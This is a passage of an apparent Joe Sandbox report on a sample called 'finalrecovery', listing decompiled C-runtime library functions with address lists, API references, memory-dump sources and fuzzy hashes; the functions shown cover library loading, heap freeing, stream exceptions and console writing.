Function 0041E448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041E448(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x450ae8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x431b70 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00416234(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00416234(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x0041e451
0x0041e4fb
0x0041e459
0x0041e45b
0x0041e462
0x0041e464
0x0041e46a
0x0041e477
0x0041e48c
0x0041e490
0x0041e4e2
0x0041e4e2
0x0041e4e7
0x0041e4eb
0x0041e4ee
0x0041e4ee
0x0041e4f4
0x0041e4f6
0x0041e50b
0x0041e506
0x0041e50a
0x0041e50a
0x0041e4f8
0x0041e4f8
0x00000000
0x0041e4f8
0x0041e492
0x0041e49b
0x0041e4d2
0x0041e4d2
0x0041e4d4
0x0041e4d6
0x00000000
0x00000000
0x0041e4de
0x00000000
0x0041e4de
0x0041e4a5
0x0041e4aa
0x0041e4af
0x00000000
0x00000000
0x0041e4b9
0x0041e4be
0x0041e4c3
0x00000000
0x00000000
0x0041e4c8
0x0041e4ce
0x00000000
0x0041e4ce
0x0041e46f
0x00000000
0x00000000
0x00000000
0x0041e475
0x0041e504
0x00000000

Strings

ext-ms-, xrefs: 0041E4B3
api-ms-, xrefs: 0041E49F

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: f5ec6ee9c4a828023a9cd68abdd904a08f9a9bc1d08a35ee3d13f4932bbadbf7
Instruction ID: 1b69c46877ca9ef0d904cc92acdc1271cd0c3909f5a6a0ed2da18a95e796b0a5
Opcode Fuzzy Hash: f5ec6ee9c4a828023a9cd68abdd904a08f9a9bc1d08a35ee3d13f4932bbadbf7
Instruction Fuzzy Hash: 5A21D839A01220BBDB318B2B9C44BAB3758AF15B60F250132FD16A7391D738EC41C6ED

Uniqueness

Uniqueness Score: -1.00%

Function 1000728C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000728C(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x10017ec8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x10010fa8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E10006A88(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E10006A88(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x10007295
0x1000733f
0x1000729d
0x1000729f
0x100072a6
0x100072a8
0x100072ae
0x100072bb
0x100072d0
0x100072d4
0x10007326
0x10007326
0x1000732b
0x1000732f
0x10007332
0x10007332
0x10007338
0x1000733a
0x1000734f
0x1000734a
0x1000734e
0x1000734e
0x1000733c
0x1000733c
0x00000000
0x1000733c
0x100072d6
0x100072df
0x10007316
0x10007316
0x10007318
0x1000731a
0x00000000
0x00000000
0x10007322
0x00000000
0x10007322
0x100072e9
0x100072ee
0x100072f3
0x00000000
0x00000000
0x100072fd
0x10007302
0x10007307
0x00000000
0x00000000
0x1000730c
0x10007312
0x00000000
0x10007312
0x100072b3
0x00000000
0x00000000
0x00000000
0x100072b9
0x10007348
0x00000000

Strings

ext-ms-, xrefs: 100072F7
api-ms-, xrefs: 100072E3

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: fc0d4ba6ae5d50e2bc9aff7092c574b5b628507680ec6e06f5d3aac5fd0fdee7
Instruction ID: 21986d9d511b7296ab58948478620972235e9a191b8a4950b7e2820f726e8a11
Opcode Fuzzy Hash: fc0d4ba6ae5d50e2bc9aff7092c574b5b628507680ec6e06f5d3aac5fd0fdee7
Instruction Fuzzy Hash: D6216371E01225EBF722CB648C85A4E3798FB057E0F614550FD49A7295DB78EF01A6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00443054 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044301C: _free.LIBCMT ref: 00443041

_free.LIBCMT ref: 004430A2
_free.LIBCMT ref: 004430AD
_free.LIBCMT ref: 004430B8
_free.LIBCMT ref: 0044310C
_free.LIBCMT ref: 00443117
_free.LIBCMT ref: 00443122
_free.LIBCMT ref: 0044312D

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3655b3e075d1e4f0ca39580aaf83e1c418f6023985779401bf25483a1367a1ae
Instruction ID: 18b0f10dc80f86e3b47954cd7ac735c8865c2d37fda3f0ccca68a77a81fef9d4
Opcode Fuzzy Hash: 3655b3e075d1e4f0ca39580aaf83e1c418f6023985779401bf25483a1367a1ae
Instruction Fuzzy Hash: 3F116D31540B04FAFE20FFB2CC07FCB77AC5F05B06F40491EB29966066DA6EEA445699

Uniqueness

Uniqueness Score: -1.00%

Function 00425F91 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00425F91(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00425CDD(_t45, 7);
					E00425CDD(_t45 + 0x1c, 7);
					E00425CDD(_t45 + 0x38, 0xc);
					E00425CDD(_t45 + 0x68, 0xc);
					E00425CDD(_t45 + 0x98, 2);
					E0041E238( *((intOrPtr*)(_t45 + 0xa0)));
					E0041E238( *((intOrPtr*)(_t45 + 0xa4)));
					E0041E238( *((intOrPtr*)(_t45 + 0xa8)));
					E00425CDD(_t45 + 0xb4, 7);
					E00425CDD(_t45 + 0xd0, 7);
					E00425CDD(_t45 + 0xec, 0xc);
					E00425CDD(_t45 + 0x11c, 0xc);
					E00425CDD(_t45 + 0x14c, 2);
					E0041E238( *((intOrPtr*)(_t45 + 0x154)));
					E0041E238( *((intOrPtr*)(_t45 + 0x158)));
					E0041E238( *((intOrPtr*)(_t45 + 0x15c)));
					return E0041E238( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00425f97
0x00425f9c
0x00425fa5
0x00425fb0
0x00425fbb
0x00425fc6
0x00425fd4
0x00425fdf
0x00425fea
0x00425ff5
0x00426003
0x00426011
0x00426022
0x00426030
0x0042603e
0x00426049
0x00426054
0x0042605f
0x00000000
0x0042606f
0x00426074

APIs

Part of subcall function 00425CDD: _free.LIBCMT ref: 00425D02

_free.LIBCMT ref: 00425FDF

Part of subcall function 0041E238: HeapFree.KERNEL32(00000000,00000000,?,00425D07,?,00000000,?,?,?,00425FAA,?,00000007,?,?,0042649D,?), ref: 0041E24E
Part of subcall function 0041E238: GetLastError.KERNEL32(?,?,00425D07,?,00000000,?,?,?,00425FAA,?,00000007,?,?,0042649D,?,?), ref: 0041E260

_free.LIBCMT ref: 00425FEA
_free.LIBCMT ref: 00425FF5
_free.LIBCMT ref: 00426049
_free.LIBCMT ref: 00426054
_free.LIBCMT ref: 0042605F
_free.LIBCMT ref: 0042606A

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
Instruction ID: ccbebe1fecebea9e192ae0d617dfa4290ce5570b543586181d43c8756f538675
Opcode Fuzzy Hash: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
Instruction Fuzzy Hash: F0118471A42B18A6E520B773DC07FCBB79C5F05704F80081FB699EA092F67CB5449A55

Uniqueness

Uniqueness Score: -1.00%

Function 1000C54F Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000C54F(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E1000C517(_t45, 7);
					E1000C517(_t45 + 0x1c, 7);
					E1000C517(_t45 + 0x38, 0xc);
					E1000C517(_t45 + 0x68, 0xc);
					E1000C517(_t45 + 0x98, 2);
					E100079CC( *((intOrPtr*)(_t45 + 0xa0)));
					E100079CC( *((intOrPtr*)(_t45 + 0xa4)));
					E100079CC( *((intOrPtr*)(_t45 + 0xa8)));
					E1000C517(_t45 + 0xb4, 7);
					E1000C517(_t45 + 0xd0, 7);
					E1000C517(_t45 + 0xec, 0xc);
					E1000C517(_t45 + 0x11c, 0xc);
					E1000C517(_t45 + 0x14c, 2);
					E100079CC( *((intOrPtr*)(_t45 + 0x154)));
					E100079CC( *((intOrPtr*)(_t45 + 0x158)));
					E100079CC( *((intOrPtr*)(_t45 + 0x15c)));
					return E100079CC( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x1000c555
0x1000c55a
0x1000c563
0x1000c56e
0x1000c579
0x1000c584
0x1000c592
0x1000c59d
0x1000c5a8
0x1000c5b3
0x1000c5c1
0x1000c5cf
0x1000c5e0
0x1000c5ee
0x1000c5fc
0x1000c607
0x1000c612
0x1000c61d
0x00000000
0x1000c62d
0x1000c632

APIs

Part of subcall function 1000C517: _free.LIBCMT ref: 1000C53C

_free.LIBCMT ref: 1000C59D

Part of subcall function 100079CC: RtlFreeHeap.NTDLL(00000000,00000000,?,10006680), ref: 100079E2
Part of subcall function 100079CC: GetLastError.KERNEL32(?,?,10006680), ref: 100079F4

_free.LIBCMT ref: 1000C5A8
_free.LIBCMT ref: 1000C5B3
_free.LIBCMT ref: 1000C607
_free.LIBCMT ref: 1000C612
_free.LIBCMT ref: 1000C61D
_free.LIBCMT ref: 1000C628

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
Instruction ID: 6b8772b3b3c148c813ff3cd2bfd3ae69b98732a79df26756773758613eb0dbd7
Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
Instruction Fuzzy Hash: A9115179940B08BAF921EBB4CC0BFCF7B9CEF097C1F440819B69D66057DA79B9444650

Uniqueness

Uniqueness Score: -1.00%

Function 00404360 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00404360(void* __ebx, void* __ecx, signed int _a4, char _a8) {
				char _v24;
				char _v32;
				intOrPtr _v48;
				signed int _t20;
				void* _t22;
				void* _t32;
				signed char _t35;
				intOrPtr* _t37;
				char* _t40;
				intOrPtr* _t42;
				intOrPtr _t45;

				_t32 = __ebx;
				_t20 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t20;
				_t35 =  *(__ecx + 0x10) & _t20;
				if(_t35 == 0) {
					return _t20;
				} else {
					if(_a8 != 0) {
						E004103CB(0, 0);
					}
					if((_t35 & 0x00000004) == 0) {
						_t40 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
					} else {
						_t40 = "ios_base::badbit set";
					}
					_t22 = E00403B30( &_v32);
					_t37 =  &_v24;
					E00404280(_t32, _t37, _t40, _t22);
					E004103CB( &_v32, 0x43c040);
					asm("int3");
					_t45 = _v48;
					asm("xorps xmm0, xmm0");
					_t42 = _t37;
					 *_t42 = 0x42e2d4;
					asm("movq [eax], xmm0");
					_t14 = _t45 + 4; // 0x4
					E0040FEF1(_t14, _t42 + 4);
					 *_t42 = 0x439c9c;
					 *((intOrPtr*)(_t42 + 0xc)) =  *((intOrPtr*)(_t45 + 0xc));
					 *((intOrPtr*)(_t42 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10));
					 *_t42 = 0x439d14;
					return _t42;
				}
			}

0x00404360
0x0040436c
0x0040436f
0x00404375
0x00404377
0x00404384
0x00404379
0x0040437d
0x0040438b
0x0040438b
0x00404393
0x004043a9
0x00404395
0x00404395
0x00404395
0x004043b0
0x004043b7
0x004043bb
0x004043ca
0x004043cf
0x004043d4
0x004043d7
0x004043db
0x004043e1
0x004043e7
0x004043eb
0x004043ef
0x004043f4
0x00404403
0x00404408
0x0040440b
0x00404414
0x00404414

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004043EF

Part of subcall function 004103CB: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,0040DFB5,?,0043B72C,?), ref: 0041042B

Strings

`=@, xrefs: 004043F4
ios_base::failbit set, xrefs: 0040439F
ios_base::eofbit set, xrefs: 004043A4
`=@, xrefs: 00404338, 0040440B
ios_base::badbit set, xrefs: 00404395

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: `=@$`=@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-2436082744
Opcode ID: 65a52bc7dd255fb5b378f8714ebb78ffcfde0bc2dfb68a09a1b07215ad1a4b56
Instruction ID: 9264e756f140e89982348ebe607866d6270466b0d896b3508511c0a952163077
Opcode Fuzzy Hash: 65a52bc7dd255fb5b378f8714ebb78ffcfde0bc2dfb68a09a1b07215ad1a4b56
Instruction Fuzzy Hash: 6011D2B16003089BC714DF59C802B96B3E8AB84310F14953FFD65ABA81E778E854CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042073B Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E0042073B(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x43d054; // 0x8e1b5714
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x4508e0 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E004135A1( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x4508e0 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x43d298; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x4508e0 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E0041FEB0( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x43d298)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x4508e0 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E00410440( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x4508e0 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E0041FEB0( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E00420014(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E00418E34(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x4508e0 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x4508e0 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x4508e0 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E0041EE3F( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E0041EE3F();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E0040EB3F(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x00420746
0x0042074d
0x00420750
0x00420758
0x0042075b
0x00420768
0x0042076b
0x0042076e
0x00420775
0x0042077d
0x00420780
0x00420783
0x00420789
0x0042078b
0x00420792
0x0042079c
0x0042079e
0x004207a1
0x004207a4
0x004207a7
0x004207aa
0x004207ad
0x004207b3
0x00420abe
0x00420abe
0x00000000
0x004207b9
0x004207c1
0x004207c4
0x004207ca
0x004207cd
0x004207d4
0x004207db
0x004207de
0x00000000
0x00000000
0x004207e7
0x004207ec
0x004207ee
0x004207f1
0x004207f6
0x004207fa
0x00000000
0x00000000
0x00000000
0x004207fa
0x004207ff
0x00420801
0x00420806
0x004208c0
0x004208c7
0x004208c8
0x004208cb
0x004208cd
0x00420a71
0x00420a73
0x00000000
0x00420a75
0x00420a75
0x00420a78
0x00420a87
0x00420a8b
0x00420a8c
0x00420a8c
0x00000000
0x00420a90
0x004208d3
0x004208d5
0x004208db
0x004208de
0x004208ea
0x004208f3
0x004208fe
0x00420903
0x00420906
0x00420909
0x00000000
0x0042090f
0x0042090f
0x00000000
0x0042090f
0x00420909
0x0042080c
0x0042081b
0x0042081c
0x0042081f
0x00420822
0x00420827
0x00420a3d
0x00420a3f
0x00420a41
0x00420a43
0x00420a4d
0x00420a55
0x00420a57
0x00420a58
0x00420a5c
0x00420a5f
0x00420a5f
0x00420a63
0x00420a63
0x00420a63
0x00420a66
0x00420a66
0x00420a66
0x00420a68
0x00420a68
0x00420a6c
0x0042082d
0x0042082d
0x00420830
0x00420832
0x00420835
0x00420838
0x0042083c
0x0042083d
0x00420841
0x00420844
0x00420849
0x00420853
0x00420858
0x0042085b
0x0042085e
0x0042085e
0x00420861
0x00420864
0x00420866
0x0042086f
0x00420873
0x00420874
0x00420878
0x0042087e
0x00420887
0x00420894
0x0042089b
0x0042089f
0x004208aa
0x004208af
0x004208b5
0x00000000
0x004208bb
0x00420912
0x00420913
0x00420996
0x0042099d
0x004209a5
0x004209ad
0x004209b2
0x004209b5
0x004209ba
0x00000000
0x004209c0
0x004209d5
0x00420ab5
0x00420abb
0x00000000
0x004209db
0x004209e4
0x004209e6
0x004209ec
0x00000000
0x004209f2
0x004209f6
0x00420a2c
0x00420a2f
0x00000000
0x00420a35
0x00420a35
0x00000000
0x00420a35
0x004209f8
0x004209fa
0x004209fc
0x00420a15
0x00000000
0x00420a1b
0x00420a1f
0x00000000
0x00420a25
0x00420a25
0x00420a28
0x00420a29
0x00000000
0x00420a29
0x00420a1f
0x00420a15
0x004209f6
0x004209ec
0x004209d5
0x004209ba
0x004208b5
0x00420827
0x00000000
0x00420917
0x00420917
0x0042091b
0x0042091e
0x00420940
0x00420943
0x00420948
0x0042094c
0x00420950
0x0042097e
0x00420980
0x00000000
0x00420952
0x00420952
0x00420952
0x00420955
0x00420958
